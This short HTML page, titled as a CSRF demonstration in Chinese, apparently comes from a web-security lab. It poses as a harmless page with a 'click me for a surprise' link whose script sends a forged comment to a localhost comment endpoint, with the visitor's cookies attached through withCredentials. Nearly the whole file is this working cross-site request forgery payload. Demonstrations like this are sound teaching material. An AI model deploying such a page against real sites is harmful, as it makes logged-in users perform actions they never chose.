<!doctype html>
<html>
	<head>
		<meta charset="utf-8"/>
		<title>CSRF演示</title>
	</head>
	<body>
		嘿嘿,这个一个纯洁的页面。<br/>
		<a href="javascript:doCSRF();">点我有惊喜</a>
		<script>
			function doCSRF() {
				let data = {"iid": 2, "content": "点击来的,偷偷来点CSRF攻击!"};
				data = JSON.stringify(data);

				var request = new XMLHttpRequest();
				request.open("POST", "http://localhost:8080/comment/add", true);
				request.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
				request.withCredentials = true;
				request.send(data);
			}
		</script>
	</body>
</html>
